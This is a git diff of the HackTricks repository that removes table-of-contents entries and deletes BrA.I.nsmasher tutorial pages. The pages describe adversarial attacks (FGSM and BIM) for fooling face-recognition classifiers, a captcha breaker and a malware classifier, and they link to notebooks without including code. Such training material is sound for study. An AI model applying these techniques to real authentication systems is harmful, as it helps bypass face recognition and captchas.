diff --git a/SUMMARY.md b/SUMMARY.md
index e2128382d..9f1741234 100644
--- a/SUMMARY.md
+++ b/SUMMARY.md
@@ -673,7 +673,6 @@
 
 * [Physical Attacks](physical-attacks/physical-attacks.md)
 * [Escaping from KIOSKs](physical-attacks/escaping-from-gui-applications/README.md)
-  * [Show file extensions](physical-attacks/escaping-from-gui-applications/show-file-extensions.md)
 * [Firmware Analysis](physical-attacks/firmware-analysis/README.md)
   * [Bootloader testing](physical-attacks/firmware-analysis/bootloader-testing.md)
   * [Firmware Integrity](physical-attacks/firmware-analysis/firmware-integrity.md)
@@ -716,20 +715,8 @@
 * [Esoteric languages](stego/esoteric-languages.md)
 * [Blockchain & Crypto Currencies](blockchain/blockchain-and-crypto-currencies/README.md)
 
-## 🧐 External Platforms Reviews/Writeups
-
-* [BRA.I.NSMASHER Presentation](a.i.-exploiting/bra.i.nsmasher-presentation/README.md)
-  * [Basic Bruteforcer](a.i.-exploiting/bra.i.nsmasher-presentation/basic-bruteforcer.md)
-  * [Basic Captcha Breaker](a.i.-exploiting/bra.i.nsmasher-presentation/basic-captcha-breaker.md)
-  * [BIM Bruteforcer](a.i.-exploiting/bra.i.nsmasher-presentation/bim-bruteforcer.md)
-  * [Hybrid Malware Classifier Part 1](a.i.-exploiting/bra.i.nsmasher-presentation/hybrid-malware-classifier-part-1.md)
-  * [ML Basics](a.i.-exploiting/bra.i.nsmasher-presentation/ml-basics/README.md)
-    * [Feature Engineering](a.i.-exploiting/bra.i.nsmasher-presentation/ml-basics/feature-engineering.md)
-
 ## 🦂 C2
 
-* [Merlin](backdoors/merlin.md)
-* [Empire](backdoors/empire.md)
 * [Salseo](backdoors/salseo.md)
 * [ICMPsh](backdoors/icmpsh.md)
 * [Cobalt Strike](c2/cobalt-strike.md)
@@ -769,12 +756,6 @@
 * [Android Forensics](android-forensics.md)
 * [TR-069](todo/tr-069.md)
 * [6881/udp - Pentesting BitTorrent](6881-udp-pentesting-bittorrent.md)
-* [CTF Write-ups](ctf-write-ups/README.md)
-  * [challenge-0521.intigriti.io](ctf-write-ups/challenge-0521.intigriti.io.md)
-  * [Try Hack Me](ctf-write-ups/try-hack-me/README.md)
-    * [hc0n Christmas CTF - 2019](ctf-write-ups/try-hack-me/hc0n-christmas-ctf-2019.md)
-    * [Pickle Rick](ctf-write-ups/try-hack-me/pickle-rick.md)
-* [1911 - Pentesting fox](1911-pentesting-fox.md)
 * [Online Platforms with API](online-platforms-with-api.md)
 * [Stealing Sensitive Information Disclosure from a Web](stealing-sensitive-information-disclosure-from-a-web.md)
 * [Post Exploitation](post-exploitation.md)
diff --git a/a.i.-exploiting/bra.i.nsmasher-presentation/BIM_Bruteforcer.md b/a.i.-exploiting/bra.i.nsmasher-presentation/BIM_Bruteforcer.md
deleted file mode 100644
index 03869e3b3..000000000
--- a/a.i.-exploiting/bra.i.nsmasher-presentation/BIM_Bruteforcer.md
+++ /dev/null
@@ -1,44 +0,0 @@
-
-
-<details>
-
-<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
-
-Other ways to support HackTricks:
-
-* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-</details>
-
-
-This time we introduce a new type of gradient based attack, in order to brute force an image classification app (can be shaped and used for any input of course), the BIM, or Basic Iteration Method.
-
-It's reccomended to see at least the explanation in the [**introduction challenge colab Notebook**](//https://colab.research.google.com/drive/1lDh0oZ3TR-z87WjogdegZCdtsUuDADcR)
-
-To go deeper on the BIM topic:
-https://arxiv.org/pdf/1607.02533.pdf
-
-As usual we will provide only the A.I. attack core part, it's up to you to complete the tool and blending it with PT techniques, depending on the situations.
-
-Please Note:
-Remeber, in those kind of scenarios, in order to mime real-based attack applications, we don't have the exact model to fool or the image target in which we would like to transform our image. That's why, in order to overcome this issue, we must blend our core script, with a bruteforcer logic, accordingly to the application responses we want to fool.
-
-<details>
-
-<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
-
-Other ways to support HackTricks:
-
-* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-</details>
-
-
diff --git a/a.i.-exploiting/bra.i.nsmasher-presentation/Basic_Bruteforcer.md b/a.i.-exploiting/bra.i.nsmasher-presentation/Basic_Bruteforcer.md
deleted file mode 100644
index bfc053f4d..000000000
--- a/a.i.-exploiting/bra.i.nsmasher-presentation/Basic_Bruteforcer.md
+++ /dev/null
@@ -1,46 +0,0 @@
-
-
-<details>
-
-<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
-
-Other ways to support HackTricks:
-
-* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-</details>
-
-
-
-# BRUTEFORCER IMAGE CORRUPTION SCRIPT
-
-The purpose here is to introduce the user to some basic concepts about **A.I. apps exploiting**, via some easy to follow scripts, which represents the core for writing useful tools.<br>
-In this example (which can be used to solve the easy labs of BrainSmasher) by recalling also what is written in the solution for the introduction challenge, we will provide a simple yet useful way, in order to iteratively produce some corrupted images, to bruteforce the face recon easy labs (and thus also real applications that relies on the same principles)
-
-Of course we will not provide the full code but only the core part for the exploiting of the model,**instead some exercises will be left to the user (the pentesting part)**, in order to complete the tool. We will provides also some hints, just to give an idea of what can be done.
-
-The script can be found at [**IMAGE BRUTEFORCER**](https://colab.research.google.com/drive/1kUiWGRKr4vhqjI9Xgaqw3D5z3SeTXKmV)
-
-Try it on our labs [**BrA.I.Smasher Website**](https://beta.brainsmasher.eu/)
-<br>
-Enjoy and stay safe!
-
-<details>
-
-<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
-
-Other ways to support HackTricks:
-
-* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-</details>
-
-
diff --git a/a.i.-exploiting/bra.i.nsmasher-presentation/Hybrid_Malware_Classifier_Part_1.md b/a.i.-exploiting/bra.i.nsmasher-presentation/Hybrid_Malware_Classifier_Part_1.md
deleted file mode 100644
index 612835195..000000000
--- a/a.i.-exploiting/bra.i.nsmasher-presentation/Hybrid_Malware_Classifier_Part_1.md
+++ /dev/null
@@ -1,50 +0,0 @@
-
-
-<details>
-
-<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
-
-Other ways to support HackTricks:
-
-* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-</details>
-
-#INTERMEDIATE PYTHON SKILL, INTERMEDIATE MACHINE LEARNING SKILLS (Part 1)
-
-In this series of notebook we are going to build an **hybrid malware classifier.**
-
-For the **First part** we will focus on the scripting that involves dynamic analysis. Any steps of this series will come useful in order to detect malwares, and in this piece we will try to classify them based on their behaviour, utilizing the logs produced by running a program.
-
-In the **Second Part** we will see how to manipulate the logs files in order to add robustness to our classifier and adjust the code to counter the more advanced methods of A.I. Malware Evasion.
-
-In the **Third Part** we will create a Static Malware Classifier.
-
-For the **Fourth Part** For the Fourth Part we will add some tactics to add robustness to our Static classifier and merge the latter with our Dynamic Classifier.
-
-**PLEASE NOTE:** This Series strongly relies on building a dataset on your own, even if it's not mandatory.<br>
-There are also many available datasets for Static and/ or Dynamic Malware analysis on several sites for this type of classification, like Ember, VirusShare, Sorel-20M, but i strongly encourage that you build one or your own.
-
-Here's the link to our [**colab notebook**](https://colab.research.google.com/drive/1nNZLMogXF-iq-_78IvGTd-c89_C82AB8#scrollTo=lUHLMl8Pusrn) enjoy and stay safe :)
-
-
-
-<details>
-
-<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
-
-Other ways to support HackTricks:
-
-* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-</details>
-
-
diff --git a/a.i.-exploiting/bra.i.nsmasher-presentation/README.md b/a.i.-exploiting/bra.i.nsmasher-presentation/README.md
deleted file mode 100644
index 77d250ce5..000000000
--- a/a.i.-exploiting/bra.i.nsmasher-presentation/README.md
+++ /dev/null
@@ -1,70 +0,0 @@
-
-
-<details>
-
-<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
-
-Other ways to support HackTricks:
-
-* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-</details>
-
-
-# Presentation
-
-**BrainSmasher** is a platform made with the purpose of aiding **pentesters, researcher, students, A.I. Cybersecurity engineers** to practice and learn all the techniques for **exploiting commercial A.I.** applications, by working on specifically crafted labs that reproduce several systems, like face recognition, speech recognition, ensemble image classification, autonomous drive, malware evasion, chatbot, data poisoning etc...
-
-Every month a lab on various topic found in commercial A.I. applications will be posted, with **3 different difficulties** (named challenges), in order to **guide** the user in **understanding** all the mechanics behind it and practice **different** ways of **exploitation**.
-
-Since A.I. applications are relatively new, there is also the possibility that the **harder difficulty challenges for the labs don't have some public known ways of exploitation**, so it's up to you to find the correct solution. Maybe some challenges could need the **combination** of "**standard**" **cybersecurity** techniques with **machine** **learning** adversarial attacks ;)
-
-The platform, which is now in **beta** version, will also feature in the next future **paid** competitions, **job** **offers** posting, **ranking** system, **tutorials** on several A.I. exploit topics, the possibility to **earn** **money** by **proposing** personal **labs** or different challenges, for an already existent A.I. lab applications, to be used by the community and also propose modification already existent challenges in order to augment their robustness vs. the various attacks.
-
-All the **material and the techs for the exploitation of A.I. will be posted here** in a dedicated section of hacktricks.
-
-**While** we are in **beta** version and completing the implementation of all the above described features, the subscription and all the already posted labs with their relative **challenges are free**.\
-**So start learning how to exploit A.I. for free while you can in** [**BrA.I.Smasher Website**](https://beta.brainsmasher.eu)\
-ENJOY ;)
-
-_A big thanks to Hacktricks and Carlos Polop for giving us this opportunity_
-
-> _Walter Miele from BrA.I.nsmasher_
-
-# Registry Challenge
-
-In order to register in [**BrA.I.Smasher** ](https://beta.brainsmasher.eu)you need to solve an easy challenge ([**here**](https://beta.brainsmasher.eu/registrationChallenge)).\
-Just think how you can confuse a neuronal network while not confusing the other one knowing that one detects better the panda while the other one is worse...
-
-{% hint style="info" %}
-However, if at some point you **don't know how to solve** the challenge, or **even if you solve it**, check out the official solution in [**google colab**](https://colab.research.google.com/drive/1MR8i\_ATm3bn3CEqwaEnRwF0eR25yKcjn?usp=sharing).
-{% endhint %}
-
-I have to tell you that there are **easier ways** to pass the challenge, but this **solution** is **awesome** as you will learn how to pass the challenge performing an **Adversarial Image performing a Fast Gradient Signed Method (FGSM) attack for images.**
-
-# More Tutorials
-
-{% content-ref url="basic-captcha-breaker.md" %}
-[basic-captcha-breaker.md](basic-captcha-breaker.md)
-{% endcontent-ref %}
-
-
-<details>
-
-<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
-
-Other ways to support HackTricks:
-
-* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-</details>
-
-
diff --git a/a.i.-exploiting/bra.i.nsmasher-presentation/basic-bruteforcer.md b/a.i.-exploiting/bra.i.nsmasher-presentation/basic-bruteforcer.md
deleted file mode 100644
index d1737906f..000000000
--- a/a.i.-exploiting/bra.i.nsmasher-presentation/basic-bruteforcer.md
+++ /dev/null
@@ -1,46 +0,0 @@
-
-
-<details>
-
-<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
-
-Other ways to support HackTricks:
-
-* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-</details>
-
-
-# BRUTEFORCER IMAGE CORRUPTION SCRIPT
-
-The purpose here is to introduce the user to some basic concepts about **A.I. apps exploiting**, via some easy to follow scripts, which represents the core for writing useful tools.\<br>\
-In this example (which can be used to solve the easy labs of BrainSmasher) by recalling also what is written in the solution for the introduction challenge, we will provide a simple yet useful way, in order to iteratively produce some corrupted images, to bruteforce the face recon easy labs (and thus also real applications that relies on the same principles)
-
-Of course we will not provide the full code but only the core part for the exploiting of the model, **instead some exercises will be left to the user (the pentesting part)**, in order to complete the tool. We will provides also some hints, just to give an idea of what can be done.
-
-The script can be found at [**IMAGE BRUTEFORCER**](https://colab.research.google.com/drive/1kUiWGRKr4vhqjI9Xgaqw3D5z3SeTXKmV)
-
-Try it on our labs [**BrA.I.Smasher Website**](https://beta.brainsmasher.eu)
-
-Enjoy and stay safe!
-
-
-<details>
-
-<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
-
-Other ways to support HackTricks:
-
-* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-</details>
-
-
diff --git a/a.i.-exploiting/bra.i.nsmasher-presentation/basic-captcha-breaker.md b/a.i.-exploiting/bra.i.nsmasher-presentation/basic-captcha-breaker.md
deleted file mode 100644
index b409cab53..000000000
--- a/a.i.-exploiting/bra.i.nsmasher-presentation/basic-captcha-breaker.md
+++ /dev/null
@@ -1,39 +0,0 @@
-
-
-<details>
-
-<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
-
-Other ways to support HackTricks:
-
-* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-</details>
-
-
-In this tutorial **a basic captcha is going to be broken**.  
-A **NN is going to be trained** using several **images** that represents **letters** and then this NN is going to be used to **automatically identify the letters inside a captcha image**.
-
-Check the awesome guided tutorial provided by [**BrA.In Smasher**](https://beta.brainsmasher.eu/) in this [**google collab page**](https://colab.research.google.com/drive/1uiQJpqEj5V2_ijoumSd2noaDJuniTlKq?usp=sharing).
-
-
-
-<details>
-
-<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
-
-Other ways to support HackTricks:
-
-* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-</details>
-
-
diff --git a/a.i.-exploiting/bra.i.nsmasher-presentation/bim-bruteforcer.md b/a.i.-exploiting/bra.i.nsmasher-presentation/bim-bruteforcer.md
deleted file mode 100644
index ce798c5ce..000000000
--- a/a.i.-exploiting/bra.i.nsmasher-presentation/bim-bruteforcer.md
+++ /dev/null
@@ -1,48 +0,0 @@
-
-
-<details>
-
-<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
-
-Other ways to support HackTricks:
-
-* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-</details>
-
-
-# BRUTEFORCER CORE SCRIPT WITH BIM ATTACK
-
-This time we introduce a new type of gradient based attack, in order to brute force an image classification app \(can be shaped and used for any input of course\), the BIM, or Basic Iteration Method.
-
-It’s recommended to see at least the explanation in the [**introduction challenge colab Notebook**](https://colab.research.google.com/drive/1lDh0oZ3TR-z87WjogdegZCdtsUuDADcR)
-
-To go deeper on the BIM topic:[ https://arxiv.org/pdf/1607.02533.pdf](https://arxiv.org/pdf/1607.02533.pdf)
-
-As usual we will provide only the A.I. attack core part, it’s up to you to complete the tool and blending it with PT techniques, depending on the situations.
-
-{% hint style="info" %}
-Remember, in those kind of scenarios, in order to mime real-based attack applications, we don’t have the exact model to fool or the image target in which we would like to transform our image. That’s why, in order to overcome this issue, we must blend our core script, with a bruteforcer logic, accordingly to the application responses we want to fool.
-{% endhint %}
-
-
-
-<details>
-
-<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
-
-Other ways to support HackTricks:
-
-* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-</details>
-
-
diff --git a/a.i.-exploiting/bra.i.nsmasher-presentation/hybrid-malware-classifier-part-1.md b/a.i.-exploiting/bra.i.nsmasher-presentation/hybrid-malware-classifier-part-1.md
deleted file mode 100644
index 0f08c466c..000000000
--- a/a.i.-exploiting/bra.i.nsmasher-presentation/hybrid-malware-classifier-part-1.md
+++ /dev/null
@@ -1,54 +0,0 @@
-
-
-<details>
-
-<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
-
-Other ways to support HackTricks:
-
-* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-</details>
-
-
-# A.I. HYBRID MALWARE CLASSIFIER
-
-## INTERMEDIATE PYTHON SKILL, INTERMEDIATE MACHINE LEARNING SKILLS \(Part 1\)
-
-In this series of notebook we are going to build an **hybrid malware classifier.**
-
-For the **First part** we will focus on the scripting that involves dynamic analysis. Any steps of this series will come useful in order to detect malwares, and in this piece we will try to classify them based on their behaviour, utilizing the logs produced by running a program.
-
-In the **Second Part** we will see how to manipulate the logs files in order to add robustness to our classifier and adjust the code to counter the more advanced methods of A.I. Malware Evasion.
-
-In the **Third Part** we will create a Static Malware Classifier.
-
-For the **Fourth Part** For the Fourth Part we will add some tactics to add robustness to our Static classifier and merge the latter with our Dynamic Classifier.
-
-**PLEASE NOTE:** This Series strongly relies on building a dataset on your own, even if it’s not mandatory.
-
-There are also many available datasets for Static and/ or Dynamic Malware analysis on several sites for this type of classification, like Ember, VirusShare, Sorel-20M, but i strongly encourage that you build one or your own.
-
-Here’s the link to our [**colab notebook**](https://colab.research.google.com/drive/1nNZLMogXF-iq-_78IvGTd-c89_C82AB8#scrollTo=lUHLMl8Pusrn) enjoy and stay safe :\)
-
-
-
-<details>
-
-<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
-
-Other ways to support HackTricks:
-
-* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-</details>
-
-
